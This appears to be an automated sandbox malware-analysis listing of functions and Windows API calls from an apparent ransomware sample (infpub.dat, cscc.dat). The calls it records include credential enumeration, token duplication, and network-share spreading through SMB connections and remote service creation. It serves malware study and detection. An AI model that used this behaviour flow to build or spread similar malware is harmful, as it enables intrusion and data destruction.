Part of subcall function 0047742C: HeapFree.KERNEL32(00000000), ref: 0047750B

Sleep.KERNELBASE(0002BF20,002E8180,002E8180), ref: 00477874

Part of subcall function 0047751B: NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,002E8180,?,002E8180,?,002E8180,00000000,002E8180), ref: 0047754C
Part of subcall function 0047751B: NetApiBufferFree.NETAPI32(?), ref: 004775C9

Strings

localhost, xrefs: 004777F2
127.0.0.1, xrefs: 004777E7
0.0.0.0, xrefs: 004777FD

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047A476, Relevance: 12.1, APIs: 8, Instructions: 86

APIs

memset.MSVCRT ref: 0047A4A5
socket.WS2_32(00000002,00000001,00000000), ref: 0047A4C3
htons.WS2_32(?), ref: 0047A4E3
ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0047A4F7
connect.WS2_32(00000000,?,00000010), ref: 0047A509
select.WS2_32(00000001,00000000,?,00000000,?), ref: 0047A536
__WSAFDIsSet.WS2_32(00000000,?), ref: 0047A549
closesocket.WS2_32(00000000), ref: 0047A557

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00479376, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76

APIs

PathFindFileNameW.SHLWAPI(C:\Windows\infpub.dat), ref: 0047939C
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00000104,00000000,00000000), ref: 004793C8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 004793DF
inet_addr.WS2_32(?), ref: 004793E8
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000208,00000000,00000000), ref: 00479418

Part of subcall function 00475337: GetProcessHeap.KERNEL32(00000008,00000024,0000FDE9,757DF0AA,00000000,?,?,?,?,0047943A,?), ref: 0047534B
Part of subcall function 00475337: HeapAlloc.KERNEL32(00000000,?,?,?,?,0047943A,?), ref: 00475352
Part of subcall function 00475337: rand.MSVCRT ref: 00475388
Part of subcall function 00475337: rand.MSVCRT ref: 004753A8
Part of subcall function 00475337: socket.WS2_32(00000002,00000001,00000006), ref: 004753B4
Part of subcall function 00475337: htons.WS2_32(000001BD), ref: 004753DA
Part of subcall function 00475337: inet_addr.WS2_32(?), ref: 004753E7
Part of subcall function 00475337: connect.WS2_32(00000000,?,00000010), ref: 004753F7
Part of subcall function 00475337: closesocket.WS2_32(00000000), ref: 004754E7
Part of subcall function 00475337: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,0047943A,?), ref: 004754F0
Part of subcall function 00475337: HeapFree.KERNEL32(00000000), ref: 004754F7

Part of subcall function 00479332: gethostbyname.WS2_32(004793FF), ref: 0047933B
Part of subcall function 00479332: wsprintfA.USER32 ref: 00479365

Strings

C:\Windows\infpub.dat, xrefs: 00479391

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00477F04, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72

APIs

GetComputerNameW.KERNEL32(?,?), ref: 00477F3B
wsprintfW.USER32 ref: 00477F7F
CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00477F8E
GetLastError.KERNEL32 ref: 00477F99
GetLastError.KERNEL32 ref: 00477FAB

Strings

%08X%08X, xrefs: 00477F79

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004775D8, Relevance: 9.1, APIs: 6, Instructions: 103

APIs

WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 004775FD
GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 00477611
memset.MSVCRT ref: 0047762C
WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 00477640
GlobalFree.KERNEL32(00000000), ref: 004776D9
WNetCloseEnum.MPR(0000FFFF), ref: 004776E2

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00478AB3, Relevance: 9.1, APIs: 6, Instructions: 52

APIs

htonl.WS2_32(757DC426), ref: 00478AD4
htonl.WS2_32(757DC426), ref: 00478AE1
inet_ntoa.WS2_32(00000000), ref: 00478AE4

Part of subcall function 0047641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,774E2D57,?,757DC426), ref: 00476439
Part of subcall function 0047641A: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00476446
Part of subcall function 0047641A: HeapAlloc.KERNEL32(00000000), ref: 0047644D
Part of subcall function 0047641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 00476465

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 00478B02
HeapFree.KERNEL32(00000000), ref: 00478B09
LocalFree.KERNEL32(?,00002000,761A679F,757DC426), ref: 00478B1F

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476F7C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 18

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,00477170,00000000,?,00477AF8), ref: 00476F8E
GetProcAddress.KERNEL32(00000000,?,?,00477170,00000000,?,00477AF8), ref: 00476F95
IsWow64Process.KERNELBASE(?,00000000,?,?,00477170,00000000,?,00477AF8), ref: 00476FA6

Strings

IsWow64Process, xrefs: 00476F84
kernel32.dll, xrefs: 00476F89

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047A016, Relevance: 7.6, APIs: 5, Instructions: 90

APIs

GetCurrentThread.KERNEL32(0000000B,00000001,?), ref: 0047A035
OpenThreadToken.ADVAPI32(00000000), ref: 0047A03C
DuplicateTokenEx.ADVAPI32(02000000,02000000,00000000,00000002,00000002,?), ref: 0047A059

Part of subcall function 00476C5F: GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C6F
Part of subcall function 00476C5F: HeapAlloc.KERNEL32(00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C78
Part of subcall function 00476C5F: InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C81
Part of subcall function 00476C5F: GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476CAC
Part of subcall function 00476C5F: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476CAF

Part of subcall function 004775D8: WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 004775FD
Part of subcall function 004775D8: GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 00477611
Part of subcall function 004775D8: memset.MSVCRT ref: 0047762C
Part of subcall function 004775D8: WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 00477640
Part of subcall function 004775D8: GlobalFree.KERNEL32(00000000), ref: 004776D9
Part of subcall function 004775D8: WNetCloseEnum.MPR(0000FFFF), ref: 004776E2

Part of subcall function 004776F2: CredEnumerateW.ADVAPI32(00000000,00000000,?,?), ref: 0047770B
Part of subcall function 004776F2: CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 004777C3

Part of subcall function 00476CC8: EnterCriticalSection.KERNEL32(002F16E0,00477B03), ref: 00476CCD
Part of subcall function 00476CC8: InterlockedExchange.KERNEL32(002F1708,00000001), ref: 00476CD9
Part of subcall function 00476CC8: LeaveCriticalSection.KERNEL32(002F16E0), ref: 00476CE0

CloseHandle.KERNEL32(0000FFFF), ref: 0047A105

Part of subcall function 00479534: wsprintfW.USER32 ref: 0047957E
Part of subcall function 00479534: wsprintfW.USER32 ref: 004795C9
Part of subcall function 00479534: wsprintfW.USER32 ref: 004795EF
Part of subcall function 00479534: PathFindExtensionW.SHLWAPI(?), ref: 004795FC
Part of subcall function 00479534: wsprintfW.USER32 ref: 0047961A
Part of subcall function 00479534: WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00479637
Part of subcall function 00479534: PathFileExistsW.SHLWAPI(?), ref: 00479649
Part of subcall function 00479534: GetLastError.KERNEL32 ref: 00479653
Part of subcall function 00479534: GetLastError.KERNEL32(?), ref: 00479674
Part of subcall function 00479534: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 004796B9
Part of subcall function 00479534: OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 00479714
Part of subcall function 00479534: memset.MSVCRT ref: 00479735
Part of subcall function 00479534: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00479742
Part of subcall function 00479534: wsprintfW.USER32 ref: 0047975A
Part of subcall function 00479534: CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00479783
Part of subcall function 00479534: StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00479798
Part of subcall function 00479534: GetLastError.KERNEL32 ref: 004797A6
Part of subcall function 00479534: QueryServiceStatus.ADVAPI32(?,?), ref: 004797D5
Part of subcall function 00479534: Sleep.KERNEL32(00001388), ref: 004797E7
Part of subcall function 00479534: DeleteService.ADVAPI32(?), ref: 004797F7
Part of subcall function 00479534: CloseServiceHandle.ADVAPI32(?), ref: 00479801
Part of subcall function 00479534: GetLastError.KERNEL32 ref: 00479809
Part of subcall function 00479534: CloseServiceHandle.ADVAPI32(?), ref: 00479822
Part of subcall function 00479534: GetLastError.KERNEL32 ref: 0047982A
Part of subcall function 00479534: DeleteFileW.KERNEL32(?), ref: 0047983E
Part of subcall function 00479534: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 00479857
Part of subcall function 00479534: SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,0047A0AD,00000000,00000000,00000000,00000000,00476AA8,00000000,00000000,00000000,00000024,00476AA8), ref: 00479878

Part of subcall function 00476B46: GetProcessHeap.KERNEL32(00000000,"gG,?,00476722,?), ref: 00476B4E
Part of subcall function 00476B46: HeapFree.KERNEL32(00000000,?,00476722), ref: 00476B55

CloseHandle.KERNEL32(?), ref: 0047A0F5

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476C5F, Relevance: 7.5, APIs: 5, Instructions: 43

APIs

GetProcessHeap.KERNEL32(00000008,00000034,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C6F
HeapAlloc.KERNEL32(00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C78
InitializeCriticalSection.KERNEL32(00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C81
GetProcessHeap.KERNEL32(00000008,00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476CAC
RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476CAF

Part of subcall function 00476BD1: GetProcessHeap.KERNEL32(00000000,?,757DFE8D,773E29EE,?,?,00476CBD,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C29
Part of subcall function 00476BD1: HeapFree.KERNEL32(00000000), ref: 00476C2C
Part of subcall function 00476BD1: GetProcessHeap.KERNEL32(00000000,?,757DFE8D,773E29EE,?,?,00476CBD,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C39
Part of subcall function 00476BD1: HeapFree.KERNEL32(00000000), ref: 00476C3C
Part of subcall function 00476BD1: GetProcessHeap.KERNEL32(00000000,?,757DFE8D,773E29EE,?,?,00476CBD,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C4E
Part of subcall function 00476BD1: HeapFree.KERNEL32(00000000), ref: 00476C51
Part of subcall function 00476BD1: GetProcessHeap.KERNEL32(00000000,00000000,757DFE8D,773E29EE,?,?,00476CBD,?,?,00000000,?,00477A55,00000024,00476AA8,00000000,0000FFFF), ref: 00476C56
Part of subcall function 00476BD1: HeapFree.KERNEL32(00000000), ref: 00476C59

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047A420, Relevance: 7.5, APIs: 5, Instructions: 40

APIs

GetProcessHeap.KERNEL32(00000008,00000004,757DDE72,00000000,00000000,?,?,00477B89,000000FF), ref: 0047A436
HeapAlloc.KERNEL32(00000000,?,?,00477B89,000000FF), ref: 0047A439
CreateThread.KERNEL32(00000000,00000000,0047A333,00000000,00000000,00000000), ref: 0047A454
GetProcessHeap.KERNEL32(00000000,00000000,?,?,00477B89,000000FF), ref: 0047A463
HeapFree.KERNEL32(00000000), ref: 0047A466

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047636B, Relevance: 6.1, APIs: 4, Instructions: 66

APIs

GetLogicalDrives.KERNEL32 ref: 0047637A
GetDriveTypeW.KERNELBASE(?), ref: 004763B8
LocalAlloc.KERNEL32(00000040,00000050), ref: 004763C7
CreateThread.KERNEL32(00000000,00000000,00476299,00000000,00000000,00000000), ref: 00476404

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047A112, Relevance: 5.1, APIs: 4, Instructions: 64

APIs

HeapFree.KERNEL32(00000000), ref: 0047A19C

Part of subcall function 00479534: wsprintfW.USER32 ref: 0047957E
Part of subcall function 00479534: wsprintfW.USER32 ref: 004795C9
Part of subcall function 00479534: wsprintfW.USER32 ref: 004795EF
Part of subcall function 00479534: PathFindExtensionW.SHLWAPI(?), ref: 004795FC
Part of subcall function 00479534: wsprintfW.USER32 ref: 0047961A
Part of subcall function 00479534: WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00479637
Part of subcall function 00479534: PathFileExistsW.SHLWAPI(?), ref: 00479649
Part of subcall function 00479534: GetLastError.KERNEL32 ref: 00479653
Part of subcall function 00479534: GetLastError.KERNEL32(?), ref: 00479674
Part of subcall function 00479534: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 004796B9
Part of subcall function 00479534: OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 00479714
Part of subcall function 00479534: memset.MSVCRT ref: 00479735
Part of subcall function 00479534: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00479742
Part of subcall function 00479534: wsprintfW.USER32 ref: 0047975A
Part of subcall function 00479534: CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00479783
Part of subcall function 00479534: StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00479798
Part of subcall function 00479534: GetLastError.KERNEL32 ref: 004797A6
Part of subcall function 00479534: QueryServiceStatus.ADVAPI32(?,?), ref: 004797D5
Part of subcall function 00479534: Sleep.KERNEL32(00001388), ref: 004797E7
Part of subcall function 00479534: DeleteService.ADVAPI32(?), ref: 004797F7
Part of subcall function 00479534: CloseServiceHandle.ADVAPI32(?), ref: 00479801
Part of subcall function 00479534: GetLastError.KERNEL32 ref: 00479809
Part of subcall function 00479534: CloseServiceHandle.ADVAPI32(?), ref: 00479822
Part of subcall function 00479534: GetLastError.KERNEL32 ref: 0047982A
Part of subcall function 00479534: DeleteFileW.KERNEL32(?), ref: 0047983E
Part of subcall function 00479534: WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 00479857
Part of subcall function 00479534: SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,0047A0AD,00000000,00000000,00000000,00000000,00476AA8,00000000,00000000,00000000,00000024,00476AA8), ref: 00479878

Part of subcall function 004798AB: CreateThread.KERNEL32(00000000,00000000,0047988B,?,00000004,00000000), ref: 004798FD
Part of subcall function 004798AB: SetThreadToken.ADVAPI32(?,?,?,0047A15C,?,00000000), ref: 0047990F
Part of subcall function 004798AB: ResumeThread.KERNEL32(?,?,0047A15C,?,00000000), ref: 0047991C
Part of subcall function 004798AB: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0047992C
Part of subcall function 004798AB: GetLastError.KERNEL32(?,0047A15C,?,00000000), ref: 00479934
Part of subcall function 004798AB: CloseHandle.KERNEL32(?), ref: 0047993D

GetProcessHeap.KERNEL32(00000000,?), ref: 0047A18B
HeapFree.KERNEL32(00000000), ref: 0047A194
GetProcessHeap.KERNEL32(00000000,?), ref: 0047A199

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00477E8E, Relevance: 4.5, APIs: 3, Instructions: 43

APIs

Part of subcall function 00477E69: PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat), ref: 00477E7C

PathFileExistsW.SHLWAPI(?), ref: 00477EB1
GetCurrentProcess.KERNEL32(?,?), ref: 00477EC3

Part of subcall function 00476F7C: GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,00477170,00000000,?,00477AF8), ref: 00476F8E
Part of subcall function 00476F7C: GetProcAddress.KERNEL32(00000000,?,?,00477170,00000000,?,00477AF8), ref: 00476F95
Part of subcall function 00476F7C: IsWow64Process.KERNELBASE(?,00000000,?,?,00477170,00000000,?,00477AF8), ref: 00476FA6

Part of subcall function 00478313: FindResourceW.KERNEL32(?,00000006,00000000), ref: 0047832A
Part of subcall function 00478313: LoadResource.KERNEL32(00000000), ref: 00478341
Part of subcall function 00478313: LockResource.KERNEL32(00000000), ref: 00478350
Part of subcall function 00478313: SizeofResource.KERNEL32(00000000), ref: 00478368
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000000,00000000,?,00000002), ref: 00478384
Part of subcall function 00478313: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0047838D
Part of subcall function 00478313: memcpy.MSVCRT ref: 0047839C
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000002), ref: 004783B9
Part of subcall function 00478313: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000002), ref: 004783BC
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000004,?,?,?,?,00000002), ref: 004783FE
Part of subcall function 00478313: HeapFree.KERNEL32(00000000), ref: 00478401
Part of subcall function 00478313: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000002), ref: 0047840A
Part of subcall function 00478313: HeapFree.KERNEL32(00000000), ref: 0047840D

Part of subcall function 004787E7: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004787FC
Part of subcall function 004787E7: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00478813
Part of subcall function 004787E7: CloseHandle.KERNEL32(00000000), ref: 00478824

ExitProcess.KERNEL32 ref: 00477EFD

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476FAF, Relevance: 4.5, APIs: 3, Instructions: 36

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00476FC5
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00476FDF
CloseHandle.KERNEL32(00000000), ref: 00476FF0

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 004787E7, Relevance: 4.5, APIs: 3, Instructions: 35

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004787FC
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00478813
CloseHandle.KERNEL32(00000000), ref: 00478824

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00476D35, Relevance: 3.8, APIs: 3, Instructions: 48

APIs

EnterCriticalSection.KERNEL32(00000000,757DFE8D,?,00476D1C,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000), ref: 00476D46
LeaveCriticalSection.KERNEL32(00000000,?,00476D1C,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000), ref: 00476D7F
Sleep.KERNELBASE(00002710,?,00476D1C,?,?,?,00476B24,00000000,00000000,00000000,00000000,?,0047A09A,00476AA8,00000000,00000000), ref: 00476D97

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047A333, Relevance: 3.8, APIs: 3, Instructions: 48

APIs

Sleep.KERNELBASE(?), ref: 0047A344

Part of subcall function 00476B46: GetProcessHeap.KERNEL32(00000000,"gG,?,00476722,?), ref: 00476B4E
Part of subcall function 00476B46: HeapFree.KERNEL32(00000000,?,00476722), ref: 00476B55

GetProcessHeap.KERNEL32(00000000,?,?), ref: 0047A399
HeapFree.KERNEL32(00000000), ref: 0047A3A0

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047751B, Relevance: 3.1, APIs: 2, Instructions: 73

APIs

NetServerEnum.NETAPI32(00000000,00000065,?,000000FF,?,002E8180,?,002E8180,?,002E8180,00000000,002E8180), ref: 0047754C
NetApiBufferFree.NETAPI32(?), ref: 004775C9

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00477DD0, Relevance: 3.1, APIs: 2, Instructions: 72

APIs

Part of subcall function 00476477: GetTickCount.KERNEL32(00477DDC,?,?,00000000,?,?,00477AA3,?,?,000000FF,?,?), ref: 00476477

NetServerGetInfo.NETAPI32(00000000,00000065,?,?,?,00000000,?,?,00477AA3,?,?,000000FF,?,?), ref: 00477DF6
NetApiBufferFree.NETAPI32(?,?,?,00000000,?,?,00477AA3,?,?,000000FF,?,?), ref: 00477E0F

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 00477D4E, Relevance: 3.0, APIs: 2, Instructions: 29

APIs

NetServerGetInfo.NETAPI32(00000000,00000065,?,73349263,?,?,00478C7C), ref: 00477D5F
NetApiBufferFree.NETAPI32(?,?,?,00478C7C), ref: 00477D82

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
Associated: 00000003.00000002.413541428.0047D000.00000002.sdmp
Associated: 00000003.00000002.413549631.00483000.00000004.sdmp
Associated: 00000003.00000002.413556402.00489000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_470000_rundll32.jbxd

Function 0047C493, Relevance: 1.3, APIs: 1, Instructions: 9

APIs

malloc.MSVCRT ref: 0047C49E

Memory Dump Source

Source File: 00000003.00000002.413534229.00471000.00000020.sdmp, Offset: 00470000, based on PE: true

Associated: 00000003.00000002.413525796.00470000.00000002.sdmp
